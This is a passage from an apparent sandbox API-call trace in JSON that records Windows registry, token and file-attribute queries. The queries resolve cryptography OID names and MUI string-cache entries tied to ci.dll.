            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\ci.dll,-100"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1506
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf1d0",
            "parentcaller": "0x7ffee0bb34e9",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7"
              },
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7"
              }
            ],
            "repeated": 0,
            "id": 1507
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\ci.dll,-100"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1508
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1509
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1510
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1511
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1512
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1513
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1514
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1515
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ci.dll"
              }
            ],
            "repeated": 0,
            "id": 1516
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\System32\\ci.dll,-100"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "Isolated User Mode (IUM)"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100"
              }
            ],
            "repeated": 0,
            "id": 1517
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1518
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\ci.dll,-100"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1519
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1520
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1521
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1522
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1523
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1524
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000550"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1525
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1526
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ci.dll"
              }
            ],
            "repeated": 0,
            "id": 1527
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\System32\\ci.dll,-100"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "Isolated User Mode (IUM)"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100"
              }
            ],
            "repeated": 0,
            "id": 1528
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1529
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bbf2b2",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              }
            ],
            "repeated": 0,
            "id": 1530
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              }
            ],
            "repeated": 0,
            "id": 1531
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": "1.3.6.1.4.1.311.10.3.42!7"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7"
              }
            ],
            "repeated": 0,
            "id": 1532
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000540"
              },
              {
                "name": "SubKey",
                "value": "1.3.6.1.4.1.311.10.3.42!7"
              },
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7"
              }
            ],
            "repeated": 0,
            "id": 1533
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000544"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "1"
              },
              {
                "name": "MaxValueNameLength",
                "value": "4"
              },
              {
                "name": "MaxValueLength",
                "value": "70"
              }
            ],
            "repeated": 0,
            "id": 1534
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\ci.dll,-101"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1535
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf1d0",
            "parentcaller": "0x7ffee0bb34e9",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7"
              },
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7"
              }
            ],
            "repeated": 0,
            "id": 1536
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\ci.dll,-101"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1537
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1538
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1539
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1540
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1541
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1542
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1543
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1544
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ci.dll"
              }
            ],
            "repeated": 0,
            "id": 1545
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\System32\\ci.dll,-101"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "Enclave"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101"
              }
            ],
            "repeated": 0,
            "id": 1546
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1547
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\ci.dll,-101"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1548
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
